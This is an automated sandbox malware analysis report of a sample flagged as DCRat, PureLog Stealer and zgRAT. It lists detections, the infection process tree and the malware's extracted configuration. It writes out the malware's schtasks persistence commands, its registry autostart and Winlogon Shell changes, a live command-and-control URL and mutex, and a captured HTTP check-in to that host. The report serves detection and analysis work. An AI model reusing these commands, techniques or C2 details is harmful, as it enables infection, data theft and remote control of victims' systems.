Windows Analysis Report
544WP3NHaP.exe

Overview

General Information

Sample name: 544WP3NHaP.exe
renamed because original name is a hash value
Original sample name: 50abe040b81818bf7ece156a10dbbbc9.exe
Analysis ID: 1583089
MD5: 50abe040b81818bf7ece156a10dbbbc9
SHA1: 6abd8cfaaeea27ea9b2c7e5a6e05e9f4357c6050
SHA256: 730cba8b2d68de1062f9ccaa22e62b4cdb71f08283d1d5fd985941e7e3087921
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 544WP3NHaP.exe (PID: 7076 cmdline: "C:\Users\user\Desktop\544WP3NHaP.exe" MD5: 50ABE040B81818BF7ECE156A10DBBBC9)
    • wscript.exe (PID: 6360 cmdline: "C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6196 cmdline: C:\Windows\system32\cmd.exe /c ""C:\bridgemssurrogateintonet\7tLztOWB7CeM.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bridgeportDhcpcommon.exe (PID: 6288 cmdline: "C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe" MD5: F9C0873D0CBC71DB9729CDF3B976A5AD)
          • schtasks.exe (PID: 180 cmdline: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5840 cmdline: schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6940 cmdline: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 12 /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 4340 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 4600 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES26F0.tmp" "c:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 5236 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2536 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1028 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3612 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1272 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6388 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1196 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 12 /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 984 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5012 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 13 /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4296 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 12 /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4584 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6868 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 8 /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1368 cmdline: schtasks.exe /create /tn "bridgeportDhcpcommonb" /sc MINUTE /mo 8 /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6748 cmdline: schtasks.exe /create /tn "bridgeportDhcpcommon" /sc ONLOGON /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6360 cmdline: schtasks.exe /create /tn "bridgeportDhcpcommonb" /sc MINUTE /mo 12 /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 6500 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3052 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 4296 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe (PID: 6172 cmdline: "C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe" MD5: F9C0873D0CBC71DB9729CDF3B976A5AD)
  • iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe (PID: 180 cmdline: "C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe" MD5: F9C0873D0CBC71DB9729CDF3B976A5AD)
  • bridgeportDhcpcommon.exe (PID: 5664 cmdline: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe MD5: F9C0873D0CBC71DB9729CDF3B976A5AD)
  • bridgeportDhcpcommon.exe (PID: 5576 cmdline: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe MD5: F9C0873D0CBC71DB9729CDF3B976A5AD)
  • bridgeportDhcpcommon.exe (PID: 2536 cmdline: "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe" MD5: F9C0873D0CBC71DB9729CDF3B976A5AD)
  • cleanup
{"C2 url": "http://126987cm.renyash.ru/VmpipeJavascript_HttpauthLongpollMultiWordpressDle", "MUTEX": "DCR_MUTEX-ifozT5IhpWQVKWPrvZtc", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
544WP3NHaP.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
544WP3NHaP.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000000.1870378712.0000000000A12000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.1651965789.00000000062AB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1652451917.0000000006BBB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
5.0.bridgeportDhcpcommon.exe.a10000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
5.0.bridgeportDhcpcommon.exe.a10000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.544WP3NHaP.exe.62f96e5.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.544WP3NHaP.exe.62f96e5.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.544WP3NHaP.exe.6c096e5.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

                                    System Summary

                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 4340, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\SearchApp.exe", EventID: 13, EventType: SetValue, Image: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, ProcessId: 6288, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\SearchApp.exe", EventID: 13, EventType: SetValue, Image: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, ProcessId: 6288, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe", ParentImage: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, ParentProcessId: 6288, ParentProcessName: bridgeportDhcpcommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline", ProcessId: 4340, ProcessName: csc.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\544WP3NHaP.exe", ParentImage: C:\Users\user\Desktop\544WP3NHaP.exe, ParentProcessId: 7076, ParentProcessName: 544WP3NHaP.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe" , ProcessId: 6360, ProcessName: wscript.exe
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, ProcessId: 6288, TargetFilename: C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline

                                    Data Obfuscation

                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe", ParentImage: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, ParentProcessId: 6288, ParentProcessName: bridgeportDhcpcommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline", ProcessId: 4340, ProcessName: csc.exe
                                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                                    2025-01-01T21:47:26.530224+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 172.67.220.198 | 80 | TCP

                                    AV Detection

                                    Source: 544WP3NHaP.exeAvira: detected
                                    Source: http://126987cm.renyash.ru/Avira URL Cloud: Label: malware
                                    Source: http://126987cm.renyash.ru/VmpipeJavascript_HttpauthLongpollMultiWordpressDle.phpAvira URL Cloud: Label: malware
                                    Source: http://126987cm.renyash.ruAvira URL Cloud: Label: malware
                                    Source: C:\Recovery\SearchApp.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\bridgemssurrogateintonet\QHbd8WvF.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\LsbmIiGn.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\Desktop\KSdeeKAW.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\AjJOuhvp.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\BJIWYGBF.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: 00000005.00000002.1924266865.000000001306B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://126987cm.renyash.ru/VmpipeJavascript_HttpauthLongpollMultiWordpressDle", "MUTEX": "DCR_MUTEX-ifozT5IhpWQVKWPrvZtc", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeReversingLabs: Detection: 73%
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeReversingLabs: Detection: 73%
                                    Source: C:\Recovery\SearchApp.exeReversingLabs: Detection: 73%
                                    Source: C:\Users\user\Desktop\AjJOuhvp.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\BJIWYGBF.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\KSdeeKAW.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\LsbmIiGn.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\mEBzyVHW.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\qeNySdhc.logReversingLabs: Detection: 25%
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeReversingLabs: Detection: 73%
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeReversingLabs: Detection: 73%
                                    Source: C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeReversingLabs: Detection: 73%
                                    Source: 544WP3NHaP.exeVirustotal: Detection: 55%
                                    Source: 544WP3NHaP.exeReversingLabs: Detection: 65%
                                    Source: Submitted SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                    Source: C:\Recovery\SearchApp.exeJoe Sandbox ML: detected
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\LsbmIiGn.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\KSdeeKAW.logJoe Sandbox ML: detected
                                    Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\atZTrSKs.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\sgzhoMlY.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJoe Sandbox ML: detected
                                    Source: 544WP3NHaP.exeJoe Sandbox ML: detected
                                    Source: 00000005.00000002.1924266865.000000001306B000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-ifozT5IhpWQVKWPrvZtc","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: 00000005.00000002.1924266865.000000001306B000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://126987cm.renyash.ru/","VmpipeJavascript_HttpauthLongpollMultiWordpressDle"]]
                                    Source: 544WP3NHaP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDirectory created: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDirectory created: C:\Program Files\Windows Portable Devices\8e809f57164876
                                    Source: 544WP3NHaP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 544WP3NHaP.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.pdb source: bridgeportDhcpcommon.exe, 00000005.00000002.1918124129.0000000003C2C000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008AA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_008AA69B
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_008BC220

                                    Networking

                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 172.67.220.198:80
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
